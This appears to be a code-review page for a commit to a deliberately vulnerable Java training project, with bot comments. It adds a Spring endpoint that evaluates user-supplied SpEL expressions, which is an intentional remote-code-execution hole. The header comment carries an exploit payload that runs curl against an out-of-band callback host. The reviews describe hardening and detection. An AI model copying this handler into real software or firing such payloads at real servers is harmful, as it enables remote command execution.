java/org/joychou/controller Expand file tree Collapse file tree 3 files changed +47
-1
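--- a/[module file path not shown on page]
+++ b/[module file path not shown on page]
@@ -22,6 +22,15 @@
 </content >
 <orderEntry type =" inheritedJdk" />
 <orderEntry type =" sourceFolder" forTests =" false" />
+<orderEntry type =" module-library" >
+<library >
+<CLASSES >
+<root url =" jar://$USER_HOME$/Desktop/challenge-0.0.1-SNAPSHOT.jar!/" />
+</CLASSES >
+<JAVADOC />
+<SOURCES />
+</library >
+</orderEntry >
 <orderEntry type =" library" name =" Maven: org.springframework.boot:spring-boot-starter-web:1.5.1.RELEASE" level =" project" />
 <orderEntry type =" library" name =" Maven: org.springframework.boot:spring-boot-starter:1.5.1.RELEASE" level =" project" />
 <orderEntry type =" library" name =" Maven: org.springframework.boot:spring-boot:1.5.1.RELEASE" level =" project" />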
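Review bot: The added module-library on lines 25–33 points at `jar://$USER_HOME$/Desktop/challenge-0.0.1-SNAPSHOT.jar!/`, a machine-local path that no other checkout will resolve, so the module is broken for anyone else who opens the project. The surrounding entries are all Maven-managed, so this jar belongs in the build file as a dependency (or installed into a repository) rather than in an IDE entry; as committed, an unversioned SNAPSHOT binary with no coordinates or checksum is pulled into the project outside the build. If the file is IDE-generated it is usually better kept out of version control altogether.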
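--- /dev/null
+++ b/java/org/joychou/controller/SPEL.java
@@ -0,0 +1,37 @@
+package org .joychou .controller ;
+
+import org .springframework .expression .ExpressionParser ;
+import org .springframework .expression .spel .standard .SpelExpressionParser ;
+import org .springframework .stereotype .Controller ;
+import org .springframework .web .bind .annotation .RequestMapping ;
+import org .springframework .web .bind .annotation .ResponseBody ;
+import javax .servlet .http .HttpServletRequest ;
+
+/*
+* Author: JoyChou
+* Date: 2019年01月17日
+* Desc: SPEL导致的RCE
+* Usage: http://localhost:8080/spel/rce?expression=xxx(xxx为exp的URL编码后的值)
+* Exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
+*/
+
+@ Controller
+@ RequestMapping ("/spel" )
+public class SPEL {
+
+@ RequestMapping ("/rce" )
+@ ResponseBody
+private static String rce (HttpServletRequest request ) {
+String expression = request .getParameter ("expression" );
+ExpressionParser parser = new SpelExpressionParser ();
+String result = parser .parseExpression (expression ).getValue ().toString ();
+return result ;
+}
+
+public static void main (String [] args ) {
+ExpressionParser parser = new SpelExpressionParser ();
+String expression = "T(java.lang.Runtime).getRuntime().exec(\" open -a Calculator\" )" ;
+String result = parser .parseExpression (expression ).getValue ().toString ();
+}
+}
+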
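Review bot: `parser.parseExpression(expression).getValue().toString()` on line 27 dereferences a possibly-null evaluation result, and when the `expression` query parameter is absent `getParameter` returns null and `parseExpression(null)` throws, so both cases surface as a 500 rather than a 400; `String.valueOf(...)` plus an explicit null check on the parameter would make the demo's own behaviour predictable. For the hardened counterpart of this deliberately vulnerable handler, evaluate against a restricted context, `getValue(SimpleEvaluationContext.forReadOnlyDataBinding().build())`, which rejects type references and method invocation; `SimpleEvaluationContext` was introduced in Spring Framework 4.3.15 and the project file pins Spring Boot 1.5.1.RELEASE, so confirm the spring-expression version on the classpath before relying on it. Because the mapping accepts GET with the expression in the query string, every evaluated expression lands in the access log, which is worth stating in the header comment as the detection handle for this endpoint. `main` on lines 31–35 launches a process on whichever machine runs it and leaves `result` unused; a comment such as `// demo only: running this main starts a local process` would make that explicit. Handler methods are conventionally public instance methods; `private static` on line 24 works only because Spring invokes it reflectively, so confirm it is actually dispatched.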
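--- a/[template file path not shown on page]
+++ b/[template file path not shown on page]
@@ -4,7 +4,7 @@
 
 < h3 > file upload</ h3 >
 
-< form method ="POST " action ="/file/ upload " enctype ="multipart/form-data ">
+< form method ="POST " action ="upload " enctype ="multipart/form-data ">
 < input type ="file " name ="file " /> < br /> < br />
 < input type ="submit " value ="Submit " />
 </ form >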
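Review bot: The new `action ="upload "` on line 7 is a document-relative URL, so the browser resolves it against whatever path the page was served from; it only reaches the upload handler when that page URL's last segment sits in the same directory as the handler, and silently posts elsewhere if the template is ever served from another mapping. An absolute path as the removed line had (prefixed with the context path if the application is not deployed at root) keeps the target independent of the page URL. The form also carries no CSRF token; if that is intentional for this demo, a comment in the template saying so would stop it being copied as-is.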